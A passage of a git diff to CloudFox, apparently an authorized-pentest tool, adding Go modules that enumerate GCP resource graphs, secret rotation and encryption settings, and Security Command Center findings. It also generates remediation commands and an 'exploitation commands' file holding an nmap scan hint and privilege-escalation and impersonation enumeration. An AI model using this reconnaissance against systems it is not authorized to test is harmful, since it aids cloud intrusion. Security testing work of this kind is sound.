Create type summary sorted by count + var summaryList []*ResourceTypeSummary + for _, summary := range m.TypeSummary { + summaryList = append(summaryList, summary) + } + sort.Slice(summaryList, func(i, j int) bool { + return summaryList[i].Count > summaryList[j].Count + }) + + // Type Summary table + summaryHeader := []string{ + "Asset Type", + "Count", + "Projects", + } + + var summaryBody [][]string + for _, s := range summaryList { + summaryBody = append(summaryBody, []string{ + truncateString(s.AssetType, 50), + fmt.Sprintf("%d", s.Count), + fmt.Sprintf("%d", len(s.ProjectIDs)), + }) + } + + // Assets table (limited to most recent) + assetsHeader := []string{ + "Name", + "Type", + "Project", + "Location", + "Updated", + } + + // Sort by update time + sort.Slice(m.Assets, func(i, j int) bool { + return m.Assets[i].UpdateTime > m.Assets[j].UpdateTime + }) + + var assetsBody [][]string + maxAssets := 100 // Limit output size + for i, a := range m.Assets { + if i >= maxAssets { + break + } + name := a.DisplayName + if name == "" { + name = m.extractResourceName(a.Name) + } + assetsBody = append(assetsBody, []string{ + truncateString(name, 40), + truncateString(a.AssetType, 40), + a.ProjectID, + a.Location, + truncateString(a.UpdateTime, 20), + }) + } + + // Dependencies table + depsHeader := []string{ + "Source", + "Dependency Type", + "Target", + "Target Type", + } + + var depsBody [][]string + for _, d := range m.Dependencies { + depsBody = append(depsBody, []string{ + truncateString(m.extractResourceName(d.SourceResource), 35), + d.DependencyType, + truncateString(m.extractResourceName(d.TargetResource), 35), + truncateString(d.TargetType, 30), + }) + + // Add to loot + m.LootMap["resource-dependencies"].Contents += fmt.Sprintf( + "%s -> %s (%s)\n", + m.extractResourceName(d.SourceResource), + m.extractResourceName(d.TargetResource), + d.DependencyType, + ) + } + + // Cross-project resources table + crossHeader := []string{ + "Resource", + "Type", + "Owner Project", + "Accessed From", + "Risk", + } + + var crossBody [][]string + for _, c := range m.CrossProject { + crossBody = append(crossBody, []string{ + truncateString(m.extractResourceName(c.ResourceName), 35), + truncateString(c.ResourceType, 30), + c.OwnerProject, + strings.Join(c.AccessedFrom, ","), + c.RiskLevel, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "asset-type-summary", + Header: summaryHeader, + Body: summaryBody, + }, + } + + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + if len(depsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "resource-dependencies", + Header: depsHeader, + Body: depsBody, + }) + } + + if len(crossBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cross-project-resources", + Header: crossHeader, + Body: crossBody, + }) + } + + output := ResourceGraphOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_RESOURCEGRAPH_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *ResourceGraphModule) extractResourceName(resource string) string { + parts := strings.Split(resource, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return resource +} diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index b6375280..bbdaaf94 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -168,6 +168,30 @@ func (m *SecretsModule) initializeLootFiles() { Name: "secrets-iam-bindings", Contents: "# GCP Secret IAM Bindings\n# Generated by CloudFox\n\n", } + m.LootMap["secrets-no-rotation"] = &internal.LootFile{ + Name: "secrets-no-rotation", + Contents: "# Secrets WITHOUT Rotation\n# Generated by CloudFox\n# These secrets may contain stale credentials\n\n", + } + m.LootMap["secrets-with-rotation"] = &internal.LootFile{ + Name: "secrets-with-rotation", + Contents: "# Secrets WITH Rotation Configured\n# Generated by CloudFox\n\n", + } + m.LootMap["secrets-google-managed"] = &internal.LootFile{ + Name: "secrets-google-managed", + Contents: "# Secrets Using Google-Managed Encryption\n# Generated by CloudFox\n# Consider CMEK for compliance requirements\n\n", + } + m.LootMap["secrets-cmek"] = &internal.LootFile{ + Name: "secrets-cmek", + Contents: "# Secrets Using CMEK (Customer-Managed Encryption Keys)\n# Generated by CloudFox\n\n", + } + m.LootMap["secrets-security-recommendations"] = &internal.LootFile{ + Name: "secrets-security-recommendations", + Contents: "# Secret Manager Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", + } + m.LootMap["secrets-public-access"] = &internal.LootFile{ + Name: "secrets-public-access", + Contents: "# Secrets with PUBLIC Access\n# Generated by CloudFox\n# CRITICAL: These secrets are accessible by anyone!\n\n", + } } func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { @@ -231,6 +255,142 @@ func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { } m.LootMap["secrets-iam-bindings"].Contents += "\n" } + + // Rotation status + if secret.Rotation == "disabled" { + m.LootMap["secrets-no-rotation"].Contents += fmt.Sprintf( + "# SECRET: %s (Project: %s)\n"+ + "# Encryption: %s\n"+ + "# Created: %s\n"+ + "# Enable rotation:\n"+ + "gcloud secrets update %s \\\n"+ + " --rotation-period=90d \\\n"+ + " --next-rotation-time=$(date -u -d '+1 day' +%%Y-%%m-%%dT%%H:%%M:%%SZ) \\\n"+ + " --project=%s\n\n", + secretName, secret.ProjectID, + secret.EncryptionType, + secret.CreationTime, + secretName, secret.ProjectID, + ) + } else { + nextRotation := secret.NextRotationTime + if nextRotation == "" { + nextRotation = "Not scheduled" + } + rotationPeriod := secret.RotationPeriod + if rotationPeriod == "" { + rotationPeriod = "Not set" + } + m.LootMap["secrets-with-rotation"].Contents += fmt.Sprintf( + "# SECRET: %s (Project: %s)\n"+ + "# Rotation Period: %s\n"+ + "# Next Rotation: %s\n\n", + secretName, secret.ProjectID, + rotationPeriod, + nextRotation, + ) + } + + // Encryption type + if secret.EncryptionType == "Google-managed" { + m.LootMap["secrets-google-managed"].Contents += fmt.Sprintf( + "# SECRET: %s (Project: %s)\n"+ + "# Encryption: Google-managed\n"+ + "# NOTE: CMEK must be set at secret creation time\n\n", + secretName, secret.ProjectID, + ) + } else if secret.EncryptionType == "CMEK" { + kmsKey := secret.KMSKeyName + if kmsKey == "" { + kmsKey = "Unknown" + } + m.LootMap["secrets-cmek"].Contents += fmt.Sprintf( + "# SECRET: %s (Project: %s)\n"+ + "# Encryption: CMEK\n"+ + "# KMS Key: %s\n\n", + secretName, secret.ProjectID, kmsKey, + ) + } + + // Check for public access + for _, binding := range secret.IAMBindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + m.LootMap["secrets-public-access"].Contents += fmt.Sprintf( + "# CRITICAL: Secret with PUBLIC access!\n"+ + "# SECRET: %s (Project: %s)\n"+ + "# Role: %s, Member: %s\n"+ + "# Remove public access:\n"+ + "gcloud secrets remove-iam-policy-binding %s \\\n"+ + " --member='%s' \\\n"+ + " --role='%s' \\\n"+ + " --project=%s\n\n", + secretName, secret.ProjectID, + binding.Role, member, + secretName, member, binding.Role, secret.ProjectID, + ) + } + } + } + + // Security recommendations + m.addSecretSecurityRecommendations(secret, secretName) +} + +// addSecretSecurityRecommendations adds remediation commands for secret security issues +func (m *SecretsModule) addSecretSecurityRecommendations(secret SecretsService.SecretInfo, secretName string) { + hasRecommendations := false + recommendations := fmt.Sprintf( + "# SECRET: %s (Project: %s)\n", + secretName, secret.ProjectID, + ) + + // No rotation + if secret.Rotation == "disabled" { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Rotation not configured\n"+ + "gcloud secrets update %s \\\n"+ + " --rotation-period=90d \\\n"+ + " --next-rotation-time=$(date -u -d '+1 day' +%%Y-%%m-%%dT%%H:%%M:%%SZ) \\\n"+ + " --project=%s\n\n", + secretName, secret.ProjectID, + ) + } + + // No version destroy TTL + if secret.VersionDestroyTTL == "" { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: No version destroy TTL (old versions deleted immediately)\n"+ + "# Consider adding a delay for recovery:\n"+ + "gcloud secrets update %s \\\n"+ + " --version-destroy-ttl=86400s \\\n"+ + " --project=%s\n\n", + secretName, secret.ProjectID, + ) + } + + // Check for overly permissive IAM + for _, binding := range secret.IAMBindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: PUBLIC access (member: %s)\n"+ + "gcloud secrets remove-iam-policy-binding %s \\\n"+ + " --member='%s' \\\n"+ + " --role='%s' \\\n"+ + " --project=%s\n\n", + member, secretName, member, binding.Role, secret.ProjectID, + ) + } + } + } + + if hasRecommendations { + m.LootMap["secrets-security-recommendations"].Contents += recommendations + "\n" + } } // ------------------------------ @@ -348,6 +508,55 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) } } + // Security configuration table + securityHeader := []string{ + "Secret", + "Project ID", + "Rotation", + "Next Rotation", + "Rotation Period", + "Encrypt", + "KMS Key", + "Destroy TTL", + } + + var securityBody [][]string + for _, secret := range m.Secrets { + secretName := getSecretShortName(secret.Name) + nextRotation := secret.NextRotationTime + if nextRotation == "" { + nextRotation = "-" + } + rotationPeriod := secret.RotationPeriod + if rotationPeriod == "" { + rotationPeriod = "-" + } + kmsKey := secret.KMSKeyName + if kmsKey == "" { + kmsKey = "-" + } else { + // Truncate long key names + parts := strings.Split(kmsKey, "/") + if len(parts) > 0 { + kmsKey = parts[len(parts)-1] + } + } + destroyTTL := secret.VersionDestroyTTL + if destroyTTL == "" { + destroyTTL = "-" + } + securityBody = append(securityBody, []string{ + secretName, + secret.ProjectID, + secret.Rotation, + nextRotation, + rotationPeriod, + secret.EncryptionType, + kmsKey, + destroyTTL, + }) + } + // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -374,6 +583,13 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) }) } + // Always add security config table + tableFiles = append(tableFiles, internal.TableFile{ + Name: "secrets-security-config", + Header: securityHeader, + Body: securityBody, + }) + output := SecretsOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go new file mode 100644 index 00000000..accef968 --- /dev/null +++ b/gcp/commands/securitycenter.go @@ -0,0 +1,708 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" + +var GCPSecurityCenterCommand = &cobra.Command{ + Use: GCP_SECURITYCENTER_MODULE_NAME, + Aliases: []string{"scc", "security", "defender"}, + Short: "Enumerate Security Command Center findings and recommendations", + Long: `Enumerate Security Command Center (SCC) findings, assets, and security recommendations. + +Features: +- Lists all active SCC findings by severity (CRITICAL, HIGH, MEDIUM, LOW) +- Shows vulnerable assets and their security issues +- Identifies security posture gaps +- Provides remediation recommendations +- Generates exploitation commands for penetration testing + +Requires Security Command Center API to be enabled and appropriate IAM permissions: +- roles/securitycenter.findingsViewer or roles/securitycenter.admin`, + Run: runGCPSecurityCenterCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type SCCFinding struct { + Name string + Category string + Severity string + State string + ResourceName string + ResourceType string + ProjectID string + Description string + Recommendation string + CreateTime string + SourceDisplayName string + ExternalURI string + RiskScore int +} + +type SCCAsset struct { + Name string + ResourceName string + ResourceType string + ProjectID string + FindingCount int + Severity string // Highest severity finding +} + +type SCCSource struct { + Name string + DisplayName string + Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SecurityCenterModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Findings []SCCFinding + Assets map[string]*SCCAsset // keyed by resource name + Sources []SCCSource + LootMap map[string]*internal.LootFile + mu sync.Mutex + OrgID string + UseOrgLevel bool +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SecurityCenterOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SecurityCenterOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecurityCenterOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecurityCenterCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_SECURITYCENTER_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &SecurityCenterModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Findings: []SCCFinding{}, + Assets: make(map[string]*SCCAsset), + Sources: []SCCSource{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating Security Command Center findings...", GCP_SECURITYCENTER_MODULE_NAME) + + // Create Security Command Center client + client, err := securitycenter.NewClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Security Command Center client: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + logger.InfoM("Ensure the Security Command Center API is enabled and you have appropriate permissions", GCP_SECURITYCENTER_MODULE_NAME) + return + } + defer client.Close() + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, client, logger) + } + + // Check results + if len(m.Findings) == 0 { + logger.InfoM("No Security Command Center findings found", GCP_SECURITYCENTER_MODULE_NAME) + logger.InfoM("This could mean: (1) SCC is not enabled, (2) No findings exist, or (3) Insufficient permissions", GCP_SECURITYCENTER_MODULE_NAME) + return + } + + // Count findings by severity + criticalCount := 0 + highCount := 0 + mediumCount := 0 + lowCount := 0 + for _, f := range m.Findings { + switch f.Severity { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + case "MEDIUM": + mediumCount++ + case "LOW": + lowCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d SCC finding(s): %d CRITICAL, %d HIGH, %d MEDIUM, %d LOW", + len(m.Findings), criticalCount, highCount, mediumCount, lowCount), GCP_SECURITYCENTER_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SecurityCenterModule) processProject(ctx context.Context, projectID string, client *securitycenter.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating SCC findings for project: %s", projectID), GCP_SECURITYCENTER_MODULE_NAME) + } + + // List active findings for this project + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + // Create request to list findings + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, // Only active findings + } + + it := client.ListFindings(ctx, req) + + findingsCount := 0 + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing findings for project %s: %v", projectID, err), GCP_SECURITYCENTER_MODULE_NAME) + } + break + } + + finding := result.Finding + if finding == nil { + continue + } + + // Parse the finding + sccFinding := m.parseFinding(finding, projectID) + + m.mu.Lock() + m.Findings = append(m.Findings, sccFinding) + + // Track affected assets + if sccFinding.ResourceName != "" { + if asset, exists := m.Assets[sccFinding.ResourceName]; exists { + asset.FindingCount++ + // Update to highest severity + if severityRank(sccFinding.Severity) > severityRank(asset.Severity) { + asset.Severity = sccFinding.Severity + } + } else { + m.Assets[sccFinding.ResourceName] = &SCCAsset{ + Name: sccFinding.ResourceName, + ResourceName: sccFinding.ResourceName, + ResourceType: sccFinding.ResourceType, + ProjectID: projectID, + FindingCount: 1, + Severity: sccFinding.Severity, + } + } + } + + // Add to loot files + m.addFindingToLoot(sccFinding, projectID) + m.mu.Unlock() + + findingsCount++ + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d finding(s) in project %s", findingsCount, projectID), GCP_SECURITYCENTER_MODULE_NAME) + } +} + +// parseFinding converts an SCC finding to our internal structure +func (m *SecurityCenterModule) parseFinding(finding *securitycenterpb.Finding, projectID string) SCCFinding { + sccFinding := SCCFinding{ + Name: finding.Name, + Category: finding.Category, + State: finding.State.String(), + ProjectID: projectID, + ResourceName: finding.ResourceName, + Description: finding.Description, + ExternalURI: finding.ExternalUri, + } + + // Parse severity + if finding.Severity != securitycenterpb.Finding_SEVERITY_UNSPECIFIED { + sccFinding.Severity = finding.Severity.String() + } else { + sccFinding.Severity = "UNSPECIFIED" + } + + // Parse resource type from resource name + if finding.ResourceName != "" { + parts := strings.Split(finding.ResourceName, "/") + if len(parts) >= 2 { + sccFinding.ResourceType = parts[len(parts)-2] + } + } + + // Get create time + if finding.CreateTime != nil { + sccFinding.CreateTime = finding.CreateTime.AsTime().Format("2006-01-02 15:04:05") + } + + // Parse source display name from finding name + if finding.Name != "" { + // Format: organizations/{org}/sources/{source}/findings/{finding} + // or projects/{project}/sources/{source}/findings/{finding} + parts := strings.Split(finding.Name, "/") + for i, part := range parts { + if part == "sources" && i+1 < len(parts) { + sccFinding.SourceDisplayName = parts[i+1] + break + } + } + } + + // Calculate risk score based on severity and category + sccFinding.RiskScore = calculateRiskScore(sccFinding.Severity, sccFinding.Category) + + // Generate recommendation based on category + sccFinding.Recommendation = generateRecommendation(sccFinding.Category, sccFinding.ResourceType) + + return sccFinding +} + +// severityRank returns a numeric rank for severity comparison +func severityRank(severity string) int { + switch severity { + case "CRITICAL": + return 4 + case "HIGH": + return 3 + case "MEDIUM": + return 2 + case "LOW": + return 1 + default: + return 0 + } +} + +// calculateRiskScore calculates a risk score based on severity and category +func calculateRiskScore(severity, category string) int { + baseScore := 0 + switch severity { + case "CRITICAL": + baseScore = 90 + case "HIGH": + baseScore = 70 + case "MEDIUM": + baseScore = 50 + case "LOW": + baseScore = 30 + default: + baseScore = 10 + } + + // Adjust based on category + categoryLower := strings.ToLower(category) + if strings.Contains(categoryLower, "public") { + baseScore += 10 + } + if strings.Contains(categoryLower, "credential") || strings.Contains(categoryLower, "secret") { + baseScore += 10 + } + if strings.Contains(categoryLower, "firewall") || strings.Contains(categoryLower, "open") { + baseScore += 5 + } + + if baseScore > 100 { + baseScore = 100 + } + return baseScore +} + +// generateRecommendation generates a remediation recommendation based on category +func generateRecommendation(category, resourceType string) string { + categoryLower := strings.ToLower(category) + + switch { + case strings.Contains(categoryLower, "public"): + return "Restrict public access and implement proper network controls" + case strings.Contains(categoryLower, "firewall"): + return "Review and restrict firewall rules to limit exposure" + case strings.Contains(categoryLower, "encryption"): + return "Enable encryption at rest and in transit" + case strings.Contains(categoryLower, "iam"): + return "Review IAM permissions and apply least privilege principle" + case strings.Contains(categoryLower, "logging"): + return "Enable audit logging and monitoring" + case strings.Contains(categoryLower, "mfa") || strings.Contains(categoryLower, "2sv"): + return "Enable multi-factor authentication" + case strings.Contains(categoryLower, "ssl") || strings.Contains(categoryLower, "tls"): + return "Upgrade to TLS 1.2+ and disable weak ciphers" + case strings.Contains(categoryLower, "password"): + return "Implement strong password policies" + case strings.Contains(categoryLower, "key"): + return "Rotate keys and implement key management best practices" + case strings.Contains(categoryLower, "backup"): + return "Implement backup and disaster recovery procedures" + default: + return "Review finding and implement appropriate security controls" + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecurityCenterModule) initializeLootFiles() { + m.LootMap["scc-critical-findings"] = &internal.LootFile{ + Name: "scc-critical-findings", + Contents: "# Security Command Center - Critical Findings\n# Generated by CloudFox\n# These require immediate attention!\n\n", + } + m.LootMap["scc-high-severity"] = &internal.LootFile{ + Name: "scc-high-severity", + Contents: "# Security Command Center - High Severity Findings\n# Generated by CloudFox\n\n", + } + m.LootMap["scc-remediation-commands"] = &internal.LootFile{ + Name: "scc-remediation-commands", + Contents: "# Security Command Center - Remediation Commands\n# Generated by CloudFox\n# These commands can help address security findings\n\n", + } + m.LootMap["scc-affected-assets"] = &internal.LootFile{ + Name: "scc-affected-assets", + Contents: "# Security Command Center - Affected Assets\n# Generated by CloudFox\n\n", + } + m.LootMap["scc-exploitation-commands"] = &internal.LootFile{ + Name: "scc-exploitation-commands", + Contents: "# Security Command Center - Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } +} + +func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID string) { + // Critical findings + if finding.Severity == "CRITICAL" { + m.LootMap["scc-critical-findings"].Contents += fmt.Sprintf( + "## Finding: %s\n"+ + "Category: %s\n"+ + "Resource: %s\n"+ + "Project: %s\n"+ + "Risk Score: %d\n"+ + "Description: %s\n"+ + "Recommendation: %s\n\n", + finding.Name, + finding.Category, + finding.ResourceName, + projectID, + finding.RiskScore, + finding.Description, + finding.Recommendation, + ) + } + + // High severity findings + if finding.Severity == "HIGH" { + m.LootMap["scc-high-severity"].Contents += fmt.Sprintf( + "## Finding: %s\n"+ + "Category: %s\n"+ + "Resource: %s\n"+ + "Project: %s\n"+ + "Recommendation: %s\n\n", + finding.Name, + finding.Category, + finding.ResourceName, + projectID, + finding.Recommendation, + ) + } + + // Remediation commands based on category + categoryLower := strings.ToLower(finding.Category) + if finding.Severity == "CRITICAL" || finding.Severity == "HIGH" { + m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Resource: %s\n", + finding.Category, + finding.Severity, + finding.ResourceName, + ) + + // Add specific remediation commands based on category + switch { + case strings.Contains(categoryLower, "public_bucket"): + m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( + "gsutil iam ch -d allUsers:objectViewer %s\n"+ + "gsutil iam ch -d allAuthenticatedUsers:objectViewer %s\n\n", + finding.ResourceName, + finding.ResourceName, + ) + case strings.Contains(categoryLower, "firewall"): + m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( + "# Review firewall rule:\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n"+ + "# Delete if unnecessary:\n"+ + "# gcloud compute firewall-rules delete %s --project=%s\n\n", + finding.ResourceName, + projectID, + finding.ResourceName, + projectID, + ) + case strings.Contains(categoryLower, "service_account_key"): + m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( + "# List and delete old keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s\n\n", + finding.ResourceName, + ) + default: + m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( + "# See SCC console for detailed remediation steps:\n"+ + "# %s\n\n", + finding.ExternalURI, + ) + } + + // Add exploitation commands for pentest + switch { + case strings.Contains(categoryLower, "public"): + m.LootMap["scc-exploitation-commands"].Contents += fmt.Sprintf( + "# Publicly accessible resource: %s\n"+ + "# Category: %s\n"+ + "# Attempt to access without authentication\n\n", + finding.ResourceName, + finding.Category, + ) + case strings.Contains(categoryLower, "firewall"): + m.LootMap["scc-exploitation-commands"].Contents += fmt.Sprintf( + "# Open firewall rule detected: %s\n"+ + "# Category: %s\n"+ + "# Scan for accessible services:\n"+ + "# nmap -Pn -p- \n\n", + finding.ResourceName, + finding.Category, + ) + } + } + + // Track affected assets + if finding.ResourceName != "" { + m.LootMap["scc-affected-assets"].Contents += fmt.Sprintf( + "%s (%s) - %s\n", + finding.ResourceName, + finding.Severity, + finding.Category, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort findings by severity + sort.Slice(m.Findings, func(i, j int) bool { + return severityRank(m.Findings[i].Severity) > severityRank(m.Findings[j].Severity) + }) + + // Main findings table + findingsHeader := []string{ + "Severity", + "Category", + "Resource", + "Project", + "Risk Score", + "Created", + } + + var findingsBody [][]string + for _, f := range m.Findings { + findingsBody = append(findingsBody, []string{ + f.Severity, + f.Category, + sccTruncateString(f.ResourceName, 60), + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + f.CreateTime, + }) + } + + // Critical/High findings table + criticalHeader := []string{ + "Category", + "Resource", + "Project", + "Description", + "Recommendation", + } + + var criticalBody [][]string + for _, f := range m.Findings { + if f.Severity == "CRITICAL" || f.Severity == "HIGH" { + criticalBody = append(criticalBody, []string{ + f.Category, + sccTruncateString(f.ResourceName, 50), + f.ProjectID, + sccTruncateString(f.Description, 60), + sccTruncateString(f.Recommendation, 50), + }) + } + } + + // Assets table + assetsHeader := []string{ + "Resource", + "Type", + "Project", + "Finding Count", + "Max Severity", + } + + var assetsBody [][]string + for _, asset := range m.Assets { + assetsBody = append(assetsBody, []string{ + sccTruncateString(asset.ResourceName, 60), + asset.ResourceType, + asset.ProjectID, + fmt.Sprintf("%d", asset.FindingCount), + asset.Severity, + }) + } + + // Sort assets by finding count + sort.Slice(assetsBody, func(i, j int) bool { + return assetsBody[i][3] > assetsBody[j][3] + }) + + // Summary by category + categoryCount := make(map[string]int) + for _, f := range m.Findings { + categoryCount[f.Category]++ + } + + summaryHeader := []string{ + "Category", + "Finding Count", + } + + var summaryBody [][]string + for cat, count := range categoryCount { + summaryBody = append(summaryBody, []string{ + cat, + fmt.Sprintf("%d", count), + }) + } + + // Sort summary by count + sort.Slice(summaryBody, func(i, j int) bool { + return summaryBody[i][1] > summaryBody[j][1] + }) + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "scc-findings", + Header: findingsHeader, + Body: findingsBody, + }, + } + + // Add critical/high findings table if any + if len(criticalBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-critical-high", + Header: criticalHeader, + Body: criticalBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH severity finding(s)", len(criticalBody)), GCP_SECURITYCENTER_MODULE_NAME) + } + + // Add assets table if any + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + // Add summary table + if len(summaryBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-summary", + Header: summaryHeader, + Body: summaryBody, + }) + } + + output := SecurityCenterOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// sccTruncateString truncates a string to max length with ellipsis +func sccTruncateString(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + return s[:maxLen-3] + "..." +} diff --git a/gcp/commands/whoami-enhanced.go b/gcp/commands/whoami-enhanced.go new file mode 100644 index 00000000..a8601f9f --- /dev/null +++ b/gcp/commands/whoami-enhanced.go @@ -0,0 +1,722 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +// Module name constant for enhanced whoami +const GCP_WHOAMI_ENHANCED_MODULE_NAME string = "whoami-full" + +var GCPWhoAmIEnhancedCommand = &cobra.Command{ + Use: GCP_WHOAMI_ENHANCED_MODULE_NAME, + Aliases: []string{"whoami-enhanced", "identity", "me"}, + Short: "Display comprehensive identity context with permissions and capabilities", + Long: `Display comprehensive identity context for the authenticated GCP user/service account. + +Features: +- Current identity details (email, type, account info) +- Effective permissions across all projects +- Group memberships (if using user account) +- Service accounts that can be impersonated +- Organization and folder context +- Privilege escalation opportunities +- Token details and expiration + +This is an enhanced version of 'whoami' that provides full identity context +similar to Azure's whoami module.`, + Run: runGCPWhoAmIEnhancedCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type IdentityContext struct { + Email string + Type string // "user" or "serviceAccount" + UniqueID string + ProjectIDs []string + Organizations []OrgInfo + Folders []FolderInfo +} + +type OrgInfo struct { + Name string + DisplayName string + OrgID string +} + +type FolderInfo struct { + Name string + DisplayName string + Parent string +} + +type RoleBinding struct { + Role string + Scope string // "organization", "folder", "project" + ScopeID string + Inherited bool + Condition string +} + +type ImpersonationTarget struct { + ServiceAccount string + ProjectID string + CanImpersonate bool + CanCreateKeys bool + CanActAs bool +} + +type PrivilegeEscalationPath struct { + Name string + Description string + Risk string // CRITICAL, HIGH, MEDIUM + Command string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type WhoAmIEnhancedModule struct { + gcpinternal.BaseGCPModule + + Identity IdentityContext + RoleBindings []RoleBinding + ImpersonationTargets []ImpersonationTarget + PrivEscPaths []PrivilegeEscalationPath + DangerousPermissions []string + LootMap map[string]*internal.LootFile + mu 